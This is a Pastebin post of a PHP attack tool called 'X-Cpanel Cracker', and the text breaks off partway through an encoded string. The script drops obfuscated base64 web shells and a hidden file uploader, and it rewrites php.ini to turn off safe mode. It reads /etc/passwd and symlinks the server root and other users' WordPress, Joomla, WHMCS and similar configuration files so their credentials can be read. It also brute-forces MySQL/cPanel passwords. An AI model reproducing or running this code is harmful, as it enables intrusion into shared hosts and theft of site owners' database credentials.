API tools faq
paste
cr1p

Cpanel Cracker Advanced 2016

cr1p
Feb 17th, 2016
471
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.04 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('max_execution_time',0);
  7. @ini_set('display_errors', 0);
  8. @ini_set('output_buffering',0);
  9. @set_time_limit(0);
  10. @set_magic_quotes_runtime(0);
  11.  
  12. ?>
  13. <html>
  14. <title>X-Cpanel Cracker by IST Team</title>
  15. <body>
  16.  
  17. <STYLE>textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 10px;font-family: Tahoma; border: 1px solid #000000;}
  18. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 10px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20 }
  19. body { font-family: Tahoma}
  20. .x-inj { font-family: Vivaldi}
  21. tr { BORDER: dashed 1px #333; color: #00ff; }
  22. td { BORDER: dashed 1px #333; color: #00ff; }
  23. .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #00ff; }
  24. .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 8pt Verdana; color: #00ff00; }
  25. .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #00ff; }
  26. table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #00ff; }
  27. input { border: dashed 1px; border-color: #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: #00ff; }
  28. select { BORDER-RIGHT: Black 1px solid; BORDER-TOP: #00ff 1px solid; BORDER-LEFT: #00ff 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #00ff; BACKGROUND-COLOR: Black; font: pt Verdana; color: #00ff; }
  29. submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #00ff; }
  30. textarea { border: dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; }
  31. BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff; SCROLLBAR-SHADOW-color: #00ff; SCROLLBAR-3DLIGHT-color: #00ff; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff; SCROLLBAR-DARKSHADOW-color: #00ff margin: 1px; color: #00ff00; background-color: Black; }
  32. .main { margin: -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; }
  33. .tt { background-color: Black; }
  34. A:link { COLOR: White; TEXT-DECORATION: none }
  35. A:visited { COLOR: White; TEXT-DECORATION: none }
  36. A:hover { color: #00ff00; TEXT-DECORATION: none }
  37. A:active { color: #00ff00; TEXT-DECORATION: none }
  38. </STYLE>
  39.  
  40.  
  41. <?php
  42. @ini_set('display_errors', 0);
  43. @ini_set('output_buffering',0);
  44. echo "<center>
  45.  
  46. <img src='http://i.imgur.com/8iIL1Cx.png'><br>
  47. <b><font color='#00ff00' class='x-inj' size='5'>X-Cpanel Cracker </font><br><br><br></b><b>
  48. <font size='3'>
  49. || <a href='?do=uploader'>./Uploader</a> | <a href='?do=config'>./Config</a> | <a href='?do=bhconfig'>./B-F Config Cpanel</a> | <a href='?do=brute'>./Cpanel BruteForce</a> ||</b><br><br><br></center></font><br> ";
  50.  
  51. if(isset($_REQUEST['do'])){
  52. switch ($_REQUEST['do']){
  53. ################php info
  54. case 'bhconfig';
  55. echo "<center/><br/><b><font color=#00ff00>+--==[ B-F Config ]==--+</font></b><br><br>";
  56. mkdir('bconfig', 0755);
  57. chdir('bconfig');
  58. $akses = ".htaccess";
  59. $buka_lah = "$akses";
  60. $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
  61. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  62. AddType application/x-httpd-php .cpc
  63. ";
  64. fwrite ( $buka , $metin ) ;
  65. fclose ($buka);
  66. $confshell = 'PD9waHAgLyogfHwgSWRlYSA6OiBNci5BbHNhM2VrIHx8IFByb2dyYW1taW5nIDo6IEctQiB8fCBEZXNpZ25lciA6OiBBbC1Td2lzcmUgfHwgKi8kT09PMDAwMDAwPXVybGRlY29kZSgnJTY2JTY3JTM2JTczJTYyJTY1JTY4JTcwJTcyJTYxJTM0JTYzJTZmJTVmJTc0JTZlJTY0Jyk7JE9PTzAwMDBPMD0kT09PMDAwMDAwezR9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHszfS4kT09PMDAwMDAwezV9OyRPT08wMDAwTzAuPSRPT08wMDAwMDB7Mn0uJE9PTzAwMDAwMHsxMH0uJE9PTzAwMDAwMHsxM30uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDBPMC49JE9PTzAwMDBPMHszfS4kT09PMDAwMDAwezExfS4kT09PMDAwMDAwezEyfS4kT09PMDAwME8wezd9LiRPT08wMDAwMDB7NX07JE9PTzAwME8wMD0kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MTJ9LiRPT08wMDAwMDB7N30uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezE1fTskTzBPMDAwTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHsxfS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTR9OyRPME8wMDBPME89JE8wTzAwME8wMC4kT09PMDAwMDAwezExfTskTzBPMDAwTzAwPSRPME8wMDBPMDAuJE9PTzAwMDAwMHszfTskTzBPMDBPTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHs4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDAwTz0kT09PMDAwMDAwezN9LiRPT08wMDAwMDB7MTR9LiRPT08wMDAwMDB7OH0uJE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHs4fTskT09PME8wTzAwPV9fRklMRV9fOyRPTzAwTzAwMDA9MHgxMDdjO2V2YWwoJE9PTzAwMDBPMCgnSkU4d01EQlBNRTh3TUQwa1QwOVBNREF3VHpBd0tDUlBUMDh3VHpCUE1EQXNKM0ppSnlrN0pFOHdUekF3VDA4d01DZ2tUekF3TUU4d1R6QXdMREI0TkdNMEtUc2tUMDh3TUU4d01FOHdQU1JQVDA4d01EQXdUekFvSkU5UFR6QXdNREF3VHlna1R6QlBNREJQVHpBd0tDUlBNREF3VHpCUE1EQXNNSGd4TjJNcExDZEZiblJsY25sdmRYZHJhRkpJV1V0T1YwOVZWRUZoUW1KRFkwUmtSbVpIWjBscFNtcE1iRTF0VUhCUmNWTnpWblpZZUZwNk1ERXlNelExTmpjNE9Tc3ZQU2NzSjBGQ1EwUkZSa2RJU1VwTFRFMU9UMUJSVWxOVVZWWlhXRmxhWVdKalpHVm1aMmhwYW10c2JXNXZjSEZ5YzNSMWRuZDRlWG93TVRJek5EVTJOemc1S3k4bktTazdaWFpoYkNna1QwOHdNRTh3TUU4d0tUcz0nKSk7cmV0dXJuOz8+fkRrcjlOSGVuTkhlbk5IZTF6ZnVrZ0ZNYVhkb3lqY1VJbWIxOW9VQXh5YjE4bVJ0d213SjRMVDA5TkhyOFhUekVYUkp3bXdKWExUMDlOSGVFWEhyOFhodE9OVDA4WEhlRVhIcjhQa3I4WFR6RVhUMDhYSHRJTFR6RVhIcjhYVHpFWFJ0T05UekVYVHpFWEhlRXBSdGZ5ZG1PbEZtbHZmYmZxRHlrd0JBc0thMDlhYXJ5aVdNa2VDME9MT01jdWMwbHBVTXBIZHIxc0F1bk9GYVl6YW1jQ0d5cDZIZXJaSHpXMVlqRjRLVVN2TlVGU2sweXRXME95T0xmd1VBcFJUcjFLVDFuT0FsWUFhYWNiQnlsRENCa2pjb2FNYzJpcERNc1NkQjV2RnV5WkYzTzFmbWY0R2JQWEhUd3pZZUEyWXpJNWhaOG1oVUxwSzJjamRvOXpjVUlMVHpFWEhyOFhUekVYaFRzbGZNeVNodE9OVHpFWFR6RVhUekVwS1g9PXRtWWxmeTkwREIxbGIyeHBkQmwwaGVFcEtYcGxGbWt2Rmw5WmNibnZGbU9wZE1GUEh0TDd0TWxNaG9sekYyYTBodE9nQXI5VGF5U21mYmtTazEwcGhiU2hrdWFaZHRFOXd0T2dBcjlUYXlTbWZia1NrMTA3dG0xbGR1WWxHWFBMZmJrU3dlMElrMmkwZnVFNlJaOTNmM0ZWa3pTaGdXcGxDMml2d3RGOHdBT05XMU9jQXJBSVV5T1lUZTRoTm9pMGRCWCt0anhQY0J5TE5JUDhmb2wwZG9BK1dKMW93cll2ZE1jcGMxOWpBb3lWY0JYOFIzT3Bmb3hsTklQOEYzTzVkb0FJZnVsWGNUMEpmb2E0ZnQ5akYzSEpOSVBoQ005TEdiU2h3dEVJZEJ5WmMybFZ3ZVBJQ2JhMGR6U2h3dEVJQ015akQyZlpkM2FWY3QxamQyeHZGalBqY2pjTVlNQzJLWFBJd3RuamQyeHZGalBJd3pIektUTDVLVFNod3RFSWNNOVZmdDFNQ0IxcGR1TDZ3dU9pRG85c0NVWEljMmFWY2JjaVJ0blNmQllwY29yU2R1YWpEQk9pd29mWkNCNUxjVVhJQ2JrcENCWFN3b2lsZHVjbGZvbGpDVVhJRjJ5VkZaMXpjYmtwY2pTaHd0RUljTTlWZnQxTUNCMXBkdUw2d2VyMEZ1STd0SkVJd3VPbEd1V3NDQnhwYzI0NndvWWxkbU9sRmpTaHd0RUl3b2N2ZG1Xc2YyYXBjMmkwS0puSmQyeEx3ZVNoZ1dQaERCNVhmYldTZm9hNGZveVpjQnJTRjJhU2NCWTBHWHBNZDI1MFJiZmxEQmZQZmVQSUNNOVNjZVNoQzI5U2QzdzZ3dEhYSGVFWEhlRTd0TWt2Rk1PbEZqUElIYm40d3VZdmRvbEx3dFllVzBZZVcwSDd0TWtpQzJzbUZNOTFkTVdzQzI5U2QzdzZ3dWZQRGJPbEtYcFhDQk9MREI1bUtKRXpGdUk3dE1rdkZNT2xGSjFaQ0JPcGZiSDZ3ZWZYR2VTaGdXUGhEQjVYZmJXNmNNOWpmYlk3dElQSUNNOTRSYllQQ0JPdmZ6UElIdW40d2VuWEd0RTFGdUlJd3pFWEtBQzVPalNodG0waHcyY3ZkM09sRkpFSUdYUGhDMjlTZDN3Nnd0SFhIZUVYSGVFN3RNY3ZkbVdzY015c0RCeDVLSkV4WXVuNEtYcDBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSGVTaGNNOVZmdDEzY0JsbUR1VzZ3bzV2Rk0xaWRlU2hnV3BpR1hQSXd1T2xHdVdzY29hamQza2lmb2x2ZGpQSWRNOVZjVFNod3RuamQyeHZGalBqSHpIekh6SHpLWHA5dGpYdkYzTzVkb0ErdGpYdkRvYWljZTRoTm9rdmN1TCt0anhMRGJDSURCVzl3bU92ZDJYSk5JUDhVZXJJRjNPNWRvQTl3TVl2ZG85WktKRWpZZVcwWWVXMEtabjBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSHR3N2ZvYTRmdDFpZG9sbWRqUElDMmFWZm9hWkt6NXRSQUNJVzI5VmNNbG1iMllXQ0I1bGRlWHZVZXIrdGp4TWQza3N3bzFsZm9pdmNlMEpBcjlUYXR3K3RqeHBkbW4xZnRuVkNCMWxOVWsxRk1YSnd1TzVGb0E5d21PbEd1V0p3dWNpZHVhbE5Vd21SSk8xRk1YVmtad0lGMmw2Y1QwSlllRUp3dDgrdGp4cGRtbjFmdG4wR2JubE5Va3pmQmtzRGJXSnd1Y2lkdWFsTlVrVGZveVpmdEUrd0pFdk5JUDhSMmN2Rk0wK05va1p3dDgrTm9rWnd0OCtrelNoREJDUERiWXpjYldQa3k5V1QxWUFCWmYxRk1YbWJVTHBHWHBwY0pJaWNNbFNjYTltY2JPZ0MyOVZmb2FWZnVIUGt1YVpkdExwR1hwbEMyaXZ3dGZ5Rm1rdkZKNElVQjUyQ0J4cGN0bmFBTFhWa3pTaGdCYVNGMmE3dEpPaXdlMElIZVNoY005WmNCeWpEdGltY2JPZ2NveTBDVUlMZmJrU2hVbmlGWkVMREI1TWRabDd0TWxNaG94dmMybFZodE9wZE1jdkJ6bmZSdE9wZE1jdkJ6eWZoVWw3dE1hakRvOEl3anhKd3VZMEdCeGxOVUZJQzI5U2QzdzZ3dEg0SGVJWEtlRUlLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpLZUU0SGVJWHdlU21ObFNxYlVuYUYyYVpkTXlzY1VFTXd5bmlGM1kzZDNrTHdlUDhSMncrd3RFOENKbnpmdWxTY1QwbXdvWXZkbzlaS0pFakhlRVhIcmNvd2VTSWZvYTRmdDF6RG95TGQzRjZIdW40d2VuWEd0RXhGdUlJd3pFWEhlbm9PSkU3a3o1ZGtvbFZjTTlkSHkxZk50OUpOSkU4Q0puemZ1bFNjVDBtd29ZdmRvOVpLSkVqVzBIWEhlRVhLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpXMEhYSGVFWEtaRitCWk9wZE1jdkJ6eWZiVFh2Q2o0OENtd0lSejRKS1hQTENVU3FLWHA5dG0waGNCWVBkWkVKTm93SUYzTzVkb0E5a1puamQyeHZGalBJd3pJWEtlRTRIdEU3d3VPbEd1V3NGMmlpY285M0tqblhHdEVYRnVJSUhibjR3dEg0SGVJWEtlRUlLWkYrTm9pWk5KT2l3cllYQ0I1bGR0bm9kM2FWY29hTFJqeEpGSkV2Tkp3N3RtMGhnV3BsQzJpdnd0RjhDbXdJUno0OENtd0lSejQ4Q213SVJ6NDhDbXdJUno0OGNvbDJ3b2xMTlVrTWQyOTBjYndKTm14OHdybExjQnJJS2pQSVRid1ZXQnh6Q1RZbERabjhndG5XRk05bUZNeXNkQmxWY1pFNktKbnVSQXdJZ3VYSU9vYXpEQmZWY2J3SUtqUElXQlhzQTNmcEYza2x3dXg4d2VYdmNvbDJOSVA4UjJPcGZqNDhSMmt2Y3VMK3RqWHZEdU9zZGU0bUtYcE1mQjVqZm9sdmRKbmxHdElMQ1VYTENKWExmb2E0ZnRsN3RKT2xHdW5TZDJPbHdlMEljYmlYZG85TGNVSUxDVVhMZm9hNGZ0TDd0Sk9sR3VuU2QyT2x3ZTBJY2JpWGRvOUxjVUlMQ0pYTGNiaVhkbzlMY2FTeGJVTDd0bWtsZnVhWmRKRUxjYmlYZG85TGNhU1hiVFNoZ1dwTWZCNWpmb2x2ZEpuU2QyZnBkSklMZmJZbEZKWExGb3l6RlpsN3RKT2p3ZTBJV28xNUYzeVNiMll2ZE01bEMzV1BrMnh2QzJ5U0RvOXpmdEZTa3VhemNid1NrdW5pRjNIcEtYcHBjSklMQ1psN3RNMTVGM3lTYjJZU2QzWWxodE9qaFRTaEZNYTBmYmtWd3VPWmZCQTd0bTFsZHVZbEdYcFpjYk8xRk00SWNNeVNGMkE3dG0waGdXcE1mQjVqZm9sdmRKbm1jYk9nY295MENVSUxmYmtTaGJTaGtveVp3ZTBJQ2JrWkNiTFBrenJWZnVpMGtaWG1ISjUwR3VXbVJ0RnpSbU80ZnRGU2t6V1ZmdWkwa1pYbVlVNTBHdVdtUnRGMlJtTzRmdEZTa3pGVmZ1aTBrWlhtS3Q1MEd1V21SdEY1Um1PNGZ0RlNrekVWZnVpMGtaTDd0Sk96Rk1ISU5Vbk1EQnhsYjJmbGZ5OWpkMjUwY0I1MEZaSUxmYmtTaFRTaGtvY3Bkb2F6d2UwSWNiaVhkbzlMY1VJbU5vcklEdWtsY2owSmtaWExGM2tqaFRTaGtvT2lmb3JJTlVuaUZta2lHVUlwS1hwTWQza2xDQllQaHRPTURCeGxGWm5pRlpFTERCVzlOSk9NREJ4bGhiU2hEQkNQa29sTHdlMDl3ZUVwR1hwamQyNTBEQjUxY1RTaGdXUExjTWxTY1VFOXdvYTRGb3h2Y29BUGtadytrWlhMY01sU2NVTDd0Sk9NREJ4bHdlMElmdWtwZFVJTGNNbFNjYVNYYlVMN3RNbE1odHlsRk1hbURVSW1SbU80ZnRGU2tvY3Bkb0FwaGJTaEMyOVZmb2xWZkJBN3RtMGhrdVlaQ1pFOXdvY3Bkb2FnYzJhMGIyWXZkbU9sZG1Pemh0d0xmYmtTUlpPTURCeGx3Skw3dE1sTWh0ckxGM2tqaGJTaEMyOVZmb2xWZkJBN3RtMGhrdWF6Y2J3SU5VbnpmdWtnRk1hWGRveWpjVUlMQ2J3U2taRlNrb2NwZG9BcEtYUExmYllsRkpFOXd1WTBGbDlaY2JuU0NCWWxodE9pRkpYbWtaWExmYllsRko0bVJtTzRmdEZwS1hQTGZiWWxGSkU5d3VZMEZsOVpjYm5TQ0JZbGh0T2lGSlhta1pYTGZiWWxGSjRtUm1PNGZ0RnBLWFBMZmJZbEZKRTl3dU9aREIwUEYzT1piM2tsRm94aUMyQVBrWjUwR3VXbVJ0Rm1SdE8xRjJhWmhVTDd0TWxNaG9hWmNCZnBodGtiZDNrTEF1a2xGM0hKUnRPekZNSHBoYlNoa3VuaUYzSElOVW5sR3RJSmNvYU1EQjVsaHRmcldsOVdXYVlUYTA5VU90RlN3dEZKUnR3bWhUU0pSdE96Rk1IcEtYUExjb3kwQ2FzZndlMElDYmtaQ2JMUGt1YXpjYndTa3VuaUYzSHBLWHA5Y0J4emNiU2hrdU92RDJhVkZaRTl3dU92RDJhVmIyZmxmeTlpZG9YUGt1WVpDWkw3dE1jdkZNYWlDMklQa3VPdkQyYVZGWm5pRlpFTGZvOXFjQjRwR1hwcGNKSWlrdU92RDJhVkJ6eWZoYlNoQzI5VmZvbFZmQkE3dG0waGt1T3ZEMmFWZE15c2NVRTl3dU92RDJhVmIyNWlkQkFQa3VPdkQyYVZCem5maFRTaERCQ1BrdU92RDJhVmRNeXNjVUVpTlVFbWF5OUJXYWtrV0FrSE9VRnBHWHBqZDI1MERCNTFjVFNoZ1dQTGZNeVp3ZTBJa3VPdkQyYVZCenlmS1hwcGNKaWxGTWFtRFVJbUZveXpGWkZTa3VjaUZKTHBHWFBMY0pFOXd1WTBGbDlaY2JuU0NCWWxodEZJa1pYbWtaeGxHdElMZk15WlJ0RjdrWlhMRjNramhVTDd0Sk9pd2UwSWZ1a3BkVWlsR3RJSk5VRkpSdHdtd0pYTGNKTHBLWFBMQ0pFOXd1T1pEQjBQY2JJUGtad21SdEZKa1pYTGNKTHBLWHBwY0pJTENVRWlOVUVta1psN3RKT1hDYll6d2UwSWtvcjd0bTFsZHVZbERCQ1Brb3dJd1QwSWtaRnBHWFBMRm95ekZaRTl3dE9KS1hwOXRNbE1odE9YQ2JZendlMDl3dEZtaGJTaEMyOVZmb2xWZkJBN3RtMGhrb09pZm95ZGJVRTl3b3laRk15NWh0TzFGMmFaUnRPWENiWXpoVFNoZ1dwOXRtMGhnV3BaY2JPMUZNNElrb09pZm9yN3RtMGhLWD09YWxWblJQSXE=';
  67. $file = fopen("bhc.php" ,"w+");
  68. $write = fwrite ($file ,base64_decode($confshell));
  69. fclose($file);
  70. chmod("bhc.php", 0644);
  71. $indexshell = fopen("index.php" ,"w+");
  72. $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
  73. $tulis = fwrite( $indexshell, base64_decode($data));
  74. fclose($indexshell);
  75. echo "<iframe src=bconfig/bhc.php width=97% height=100% frameborder=0></iframe>";
  76. break;
  77.  
  78. ################CMS DETECTOR
  79. case 'config';
  80. $byphp = "safe_mode = Off
  81. disable_functions = None
  82. ";
  83. file_put_contents("php.ini",$byphp);
  84.  
  85. echo '<CENTER><b>+--=[ Config priv8 ]=--+</b><br><br>';
  86. ?>
  87.  
  88. <bR><form method=post>
  89. <textarea rows=20 cols=85 name=user><?php $users=file("/etc/passwd");
  90. foreach($users as $user)
  91. {
  92. $str=explode(":",$user);
  93. echo $str[0]."\n";
  94. }
  95.  
  96. ?></textarea><br>
  97. <input type=submit name=su value="Lets Start" /></form></CENTER>
  98. <?php
  99. error_reporting(0);
  100. echo "<font color=#00ff size=2 face=\"comic sans ms\">";
  101. if(isset($_POST['su']))
  102. {
  103. mkdir('Inject',0777);
  104. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  105. $g = fopen('Inject/.htaccess','w');
  106. fwrite($g,$rr);
  107. $indishell = symlink("/","Inject/root");
  108. $rt="<a href=Inject/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
  109. echo "Please check link given below for / folder symlink <br><u>$rt</u>";
  110.  
  111. $dir=mkdir('INJECTION',0777);
  112. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  113. $f = fopen('INJECTION/.htaccess','w');
  114.  
  115. fwrite($f,$r);
  116. $consym="<a href=INJECTION/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  117. echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  118.  
  119. $usr=explode("\n",$_POST['user']);
  120. $configuration=array("wp-config.php",
  121. "wordpress/wp-config.php",
  122. "web/wp-config.php",
  123. "wp/wp-config.php",
  124. "press/wp-config.php",
  125. "wordpress/beta/wp-config.php",
  126. "news/wp-config.php",
  127. "new/wp-config.php",
  128. "blogs/wp-config.php",
  129. "home/wp-config.php",
  130. "blog/wp-config.php",
  131. "protal/wp-config.php",
  132. "site/wp-config.php",
  133. "main/wp-config.php",
  134. "test/wp-config.php",
  135. "wp/beta/wp-config.php",
  136. "beta/wp-config.php",
  137. "joomla/configuration.php",
  138. "protal/configuration.php",
  139. "joo/configuration.php",
  140. "cms/configuration.php",
  141. "site/configuration.php",
  142. "main/configuration.php",
  143. "news/configuration.php",
  144. "new/configuration.php",
  145. "home/configuration.php",
  146. "configuration.php",
  147. "SSI.php",
  148. "forum/SSI.php",
  149. "forum/inc/config.php",
  150. "forum/includes/config.php",
  151. "upload/includes/config.php",
  152. "cc/includes/config.php",
  153. "vb/includes/config.php",
  154. "vb3/includes/config.php",
  155. "cpanel/configuration.php",
  156. "panel/configuration.php",
  157. "ubmitticket.php",
  158. "manage/configuration.php",
  159. "myshop/configuration.php",
  160. "beta/configuration.php",
  161. "includes/config.php",
  162. "lib/config.php",
  163. "conf_global.php",
  164. "inc/config.php",
  165. "incl/config.php",
  166. "include/db.php",
  167. "include/config.php",
  168. "includes/functions.php",
  169. "includes/dist-configure.php",
  170. "connect.php",
  171. "mk_conf.php",
  172. "config/koneksi.php",
  173. "system/sistem.php",
  174. "config.php",
  175. "Settings.php",
  176. "settings.php",
  177. "sites/default/settings.php",
  178. "smf/Settings.php",
  179. "forum/Settings.php",
  180. "forums/Settings.php",
  181. "host/configuration.php",
  182. "hosting/configuration.php",
  183. "hosts/configuration.php",
  184. "zencart/includes/dist-configure.php",
  185. "shop/includes/dist-configure.php",
  186. "whm/configuration.php",
  187. "whmc/configuration.php",
  188. "whmcs/configuration.php",
  189. "whmc/WHM/configuration.php",
  190. "whm/WHMCS/configuration.php",
  191. "whm/whmcs/configuration.php",
  192. "order/configuration.php",
  193. "support/configuration.php",
  194. "supports/configuration.php",
  195. "oscommerce/includes/configure.php",
  196. "oscommerces/includes/configure.php",
  197. "shopping/includes/configure.php",
  198. "sale/includes/configure.php",
  199. "config.inc.php",
  200. "amember/config.inc.php",
  201. "clients/configuration.php",
  202. "client/configuration.php",
  203. "clientes/configuration.php",
  204. "cliente/configuration.php",
  205. "clientsupport/configuration.php",
  206. "billing/configuration.php",
  207. "billings/configuration.php",
  208. "admin/conf.php",
  209. "admin/config.php");
  210. foreach($usr as $uss )
  211. {
  212. $us=trim($uss);
  213.  
  214. foreach($configuration as $c)
  215. {
  216. $rs="/home/".$us."/public_html/".$c;
  217. $r="INJECTION/".$us." .. ".$c;
  218. symlink($rs,$r);
  219.  
  220. }
  221.  
  222. }
  223.  
  224.  
  225. }
  226. break;
  227. ///////////////////////////////////
  228. case'file';
  229.  
  230.  
  231. break;
  232. ###################################
  233.  
  234. case 'brute';?>
  235. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  236. <?php
  237. /*
  238. Recoded By X'1n73ct
  239. */
  240. @set_time_limit(0);
  241. @error_reporting(0);
  242.  
  243.  
  244. if($_POST['page']=='find')
  245. {
  246. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  247. {
  248. if($_POST['type'] == 'passwd'){
  249. $e = explode("\n",$_POST['usernames']);
  250. foreach($e as $value){
  251. $k = explode(":",$value);
  252. $username .= $k['0']." ";
  253. }
  254. }elseif($_POST['type'] == 'simple'){
  255. $username = str_replace("\n",' ',$_POST['usernames']);
  256. }
  257. $a1 = explode(" ",$username);
  258. $a2 = explode("\n",$_POST['passwords']);
  259. $id2 = count($a2);
  260. $ok = 0;
  261. foreach($a1 as $user )
  262. {
  263. if($user !== '')
  264. {
  265. $user=trim($user);
  266. for($i=0;$i<=$id2;$i++)
  267. {
  268. $pass = trim($a2[$i]);
  269. if(@mysql_connect('localhost',$user,$pass))
  270. {
  271. echo "X'1n73ct ~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  272. $ok++;
  273. }
  274. }
  275. }
  276. }
  277. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x'1n73ct</b>";
  278. echo "<center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
  279. exit;
  280. }
  281. }
  282. if($_POST['pass']=='password'){
  283. @error_reporting(0);
  284. $i = getenv('REMOTE_ADDR');
  285. $d = date('D, M jS, Y H:i',time());
  286. $h = $_SERVER['HTTP_HOST'];
  287. $dir=$_SERVER['PHP_SELF'];
  288. $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
  289. $file = fopen(".php","w+");
  290. $write = fwrite ($file ,base64_decode($back));
  291. fclose($file);
  292. chmod(".php",0755);
  293. mkdir('config',0755);
  294. $cp =
  295. 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KIC